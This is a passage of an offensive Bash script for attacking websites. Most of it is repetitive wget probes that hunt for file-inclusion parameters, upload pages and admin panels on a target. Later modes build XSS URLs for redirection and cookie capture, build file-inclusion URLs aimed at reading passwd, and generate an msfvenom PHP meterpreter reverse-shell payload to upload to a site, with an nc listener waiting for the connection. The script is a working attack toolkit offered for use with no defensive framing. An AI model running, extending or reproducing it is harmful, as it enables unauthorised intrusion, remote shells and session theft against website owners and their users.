echo "-----------------------------------------------------------------------"
fi
d="/g="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/getdatd="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/go="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/HT="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/idd="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/inc="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/incfile="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/incl="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/include_file="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/include_path="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/infile="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/info="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/ir="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/lang="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/language="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/link="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/load="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/main="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/mainspot="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/msg="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/num="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/openfile="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/p="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/page="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/pagind="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/path="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/path_to_calendar="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/pg="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/plik"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/qry_str="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/rutd="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/safehtml="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/section="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/showfile="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/side="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/site_id="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/skin="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/static="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/str="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/strond="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/sub="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d=""
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/tresc="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/url="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > local file include found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/user="
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo 'ws > local file include found'
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
else
echo "ws > Remote file Include and Local file include not found"
fi
elif [ $a == -up ]
then
echo "The search started if we found vulnerability we will tell you ......"
echo "---------------------------------------------------------------------"
d="/upload.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > upload shell found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/upload.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > upload shell found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/upload.aspx"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > upload shell found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/upload.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > upload shell found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/upload.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > upload shell found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/upload.xml"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > upload shell found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
cd ..
rm -r output
fi
d="/upload.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > upload shell found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
cd ..
rm -r output
fi
d="/upload.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > upload shell found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
cd ..
rm -r output
fi
d="/upload.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > upload shell found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
elif [ $a == -xsse ]
then
while true
do
echo "ws > [*]Choose what you need do from this list"
echo "1-Print any thing you need in page"
echo "2-Make alert in browser"
echo "3-Redirection to anthor page use url"
echo "4-Extract cookie session"
read -p "ws > " exploitxss
if [ $exploitxss = 1 ]
then
read -p "ws > [*]Enter what you need print: " exurl
x=$xssv
u="<h3>$exurl<h3>"
ue=$x$u
echo "ws > Your exploit url: "
echo $ue
read -p "ws > Press <Enter> to continue"
clear
elif [ $exploitxss = 2 ]
then
read -p "ws > [*]Enter what you need print in alert: " xssalert
x=$xssv
u="<script>alert($xssalert)</script>"
ue=$x$u
echo "ws > Your exploit url: "
echo "$ue"
read -p "ws > Press <Enter to continue>"
clear
elif [ $exploitxss = 3 ]
then
echo "Note: Enter website url with http or https and www."
read -p "ws > [*]Enter website url need to redirection him: " xssre
x=$xssv
u="<script>window.location='$xssre'</script>"
ue=$x$u
echo "ws > Your exploit url: "
echo $ue
read -p "ws > Press <Enter> to continue"
clear
elif [ $exploitxss = 4 ]
then
x=$xssv
u="<script>alert(document.cookie)</script>"
ue=$x$u
echo "ws > Your exploit url: "
echo $ue
read -p "ws > Press <Enter> to continue"
clear
else
echo "ws > Optoins Not Found"
sleep 1
clear
fi
done
elif [ $a == -upe ]
then
clear
read -p "ws > [*]Enter your ip to make php payload (using msfvenom): " msfvenom
read -p "ws > [*]Enter your port: " openport
msfvenom -p php/meterpreter/reverse_tcp LHOST=$msfvenom LPORT=$openport > /root/Desktop/payload.php
echo "ws > Done .... your payload in Desktop,upload them into website to open meterpreter session"
read -p "ws > Press <Enter> when you upload payload to website to listen on your port"
nc -vlp $openport
elif [ $a == -lfi ]
then
clear
echo "Note Enter your website url with sick parameter Example: (www.site.com/index.php?id=)"
read -p "we > [*]Enter your website url: " lfi
echo "ws > [*]Choose what you need do from this list"
echo "1-Read website password in server"
echo "2-Show file and directory in your places"
echo "3-Show were are you"
echo "4-Go back in server"
echo "5-Go to another directory"
read -p "ws > " lfic
if [ $lfic = 1 ]
then
x=$lfi
u="passwd"
ue=$lfi$u
echo "ws > Your exploit url:"
echo $ue
read -p "ws > Press <Enter> to continue"
clear
elif [ $lfic = 2 ]
then
x=$lfi
u="ls"
ue=$x$u
echo "ws > Your exploit url:"
echo $ue
read -p "ws > Press <Enter> to continue"
clear
elif [ $lfic = 3 ]
then
x=$lfi
u="pwd"
ue=$x$u
echo "ws > Your exploit url:"
echo $ue
read -p "ws > Press <Enter> to continue"
clear
elif [ $lfic = 4 ]
then
x=$lfi
u="cd .."
ue=$x$u
echo "ws > Your exploit url:"
echo $ue
read -p "ws > Press <Enter> to continue"
clear
elif [ $lfic = 5 ]
then
read -p "ws > Where you want to go: " d
x=$lfi
u="cd $d"
ue=$x$u
echo "ws > Your exploit url:"
echo $ue
read -p "ws > Press <Enter> to continue"
clear
fi
elif [ $a == -ac ]
then
echo "The search started if we found vulnerability we will tell you ......"
echo "---------------------------------------------------------------------"
d="/_admin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/0admin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/0manager"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/aadmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/acceso.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/acceso.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/acceso.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/acceso.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/acceso.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/acceso.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/access.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/access.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/access"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/account.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/account.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/account.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/account.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/account.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/account.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/account.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/accounts.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/accounts.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/accounts"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/acct_login"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/acesso"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adimin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adiministrador"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adimistrador"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adm.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adm.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adm.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adm.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adm.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adm.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adm.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adm/admloginuser.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adm/admloginuser.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adm/admloginuser.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adm/admloginuser.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adm/admloginuser.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adm/admloginuser.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adm/index.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adm/index.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adm/index.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adm/index.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adm/index.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adm/index.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adm/index.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adm_auth.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adm_auth.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adm_auth.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/adm_auth.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
